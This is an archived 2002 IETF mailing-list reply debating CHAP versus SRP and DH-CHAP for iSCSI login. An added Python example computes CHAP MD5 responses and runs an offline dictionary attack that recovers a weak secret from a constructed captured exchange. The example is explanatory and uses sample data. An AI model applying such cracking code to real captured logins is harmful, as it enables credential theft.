RE: iSCSI:SRP

On Wed, 3 Apr 2002, Paul Koning wrote:

> Excerpt of message (sent 3 April 2002) by Black_David@emc.com:
> > > They asked us to "consider" DH+Chap but it was not a hard requirement, you
> > > told us that they would accept Chap, but wanted us to consider a way to
> > > make it more secure. I think the work that has been done, is clearly
> > > considering it, and with the combination of SRP and current Chap clearly
> > > meets requirements.
>
> Wasn't that "consider DH+CHAP" in the context of the possible need to
> drop SRP down to optional and make CHAP mandatory?

Yes, but that need hasn't gone away.

> > That work is not complete. There are at least two technical explanations
> > missing that have to go into the iSCSI specification in order to
> > pursue this course of action:
> >
> > (1) Why is CHAP by itself not sufficient?
> > (2) Why is SRP preferable to DH-CHAP?
> >
> > The second one is crucial as it is the justification to the IESG that
> > technology potentially subject to patents needs to be used in preference
> > to unencumbered technology.
>
> I thought the answers to both are obvious already.
>
> 1. CHAP is vulnerable to certain attacks that SRP does not suffer
> from, and is one-way.

Are these concerns strong enough to warrant using patented technologies?

While I gather it wasn't always so, IPsec is now the primary form of
security for iSCSI connections. Whatever login method is chosen, it will
(should) be happening in an ESP-protected channel. ESP will be set up
before iSCSI login. That limits who can perform the attacks CHAP is
vulnerable to: persons with some level of trust on the involved machines.
If someone can snoop clear text which is usually protected by ESP (i.e.
they are root on an endpoint), then what method we choose doesn't really
matter; the attacker could just snoop the process's memory and find the
clear text password used for the authentication.

> 2. DH-CHAP had not been specified yet, while SRP is a published RFC.
>
> Why isn't (2) sufficient? Surely, when we're trying to go through the
> RFC publication process, we can't be expected to consider a proposal
> that is not yet at the "draft 00" stage as a prime contender, can we?
> Otherwise no one could ever finish.

The concerns over SRP involve IPR, which is a separate question from being
an RFC.

> Is there any consensus that iSCSI Last Call should wait for DH-CHAP
> Last Call?

Yes.

Take care,
Bill
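Paul's first point above (CHAP is vulnerable to attacks SRP does not suffer from, and is one-way) and Bill's reply (those attacks need a view of the exchange that ESP normally denies) are illustrated by the following added example. It is not part of the original thread and is not code from any iSCSI implementation. It computes RFC 1994 CHAP responses with MD5 over identifier, secret and challenge (the CHAP variant iSCSI uses), verifies one as a target would, and then runs the offline dictionary attack a passive observer of the unprotected exchange can mount. The identifier, challenge, secret and wordlist are constructed for the demonstration; the function names are this example's own.

```python
import hashlib
import hmac
import os

# RFC 1994 CHAP with MD5 (algorithm 5, which iSCSI uses): the response is
# MD5(Identifier || secret || Challenge). Nothing in the response hides the
# secret from anyone who sees the exchange and can guess candidate secrets,
# and the exchange authenticates only the side that answers the challenge
# (the "one-way" property) unless a second exchange is run in reverse.
def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    if not 0 <= identifier <= 255:
        raise ValueError("CHAP identifier is a single octet")
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


def chap_verify(identifier: int, secret: bytes, challenge: bytes, response: bytes) -> bool:
    """Target-side check of an initiator's response; compare_digest avoids a
    timing side channel on the comparison itself."""
    expected = chap_response(identifier, secret, challenge)
    return hmac.compare_digest(expected, response)


def dictionary_attack(identifier: int, challenge: bytes, response: bytes, candidates):
    """Offline attack by a passive observer: try each candidate secret against
    the captured (identifier, challenge, response). Returns the secret that
    reproduces the response, or None if no candidate matches."""
    for candidate in candidates:
        if chap_response(identifier, candidate, challenge) == response:
            return candidate
    return None


# Constructed sample exchange (not a real capture): the target's challenge,
# the initiator's weak secret, and the response an eavesdropper would see on
# a connection that is NOT inside ESP.
CAPTURED_ID = 0x2A
CAPTURED_CHALLENGE = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
INITIATOR_SECRET = b"poseidon42"  # constructed weak secret
CAPTURED_RESPONSE = chap_response(CAPTURED_ID, INITIATOR_SECRET, CAPTURED_CHALLENGE)

# Constructed wordlist standing in for a real password dictionary.
WORDLIST = [b"password", b"iscsi", b"target1", b"poseidon42", b"storage"]


def demo():
    # 1. The target accepts the genuine response.
    ok = chap_verify(CAPTURED_ID, INITIATOR_SECRET, CAPTURED_CHALLENGE, CAPTURED_RESPONSE)
    # 2. A passive observer recovers the secret offline from the same bytes.
    recovered = dictionary_attack(CAPTURED_ID, CAPTURED_CHALLENGE, CAPTURED_RESPONSE, WORDLIST)
    # 3. With a random high-entropy secret the same wordlist attack fails:
    #    CHAP's resistance rests on the secret's strength, not on the hash.
    strong_secret = os.urandom(16)
    strong_response = chap_response(CAPTURED_ID, strong_secret, CAPTURED_CHALLENGE)
    not_recovered = dictionary_attack(CAPTURED_ID, CAPTURED_CHALLENGE, strong_response, WORDLIST)
    return ok, recovered, not_recovered


if __name__ == "__main__":
    print(demo())
```

The attack in step 2 only needs the three values an on-path observer sees; if the login runs inside an ESP-protected channel, as Bill describes, the observer never sees them and is reduced to the position of someone already on an endpoint. Step 3 shows the other half of the picture: even without ESP, the dictionary attack is only as good as the secret is weak, which is the usual operational argument for long random CHAP secrets.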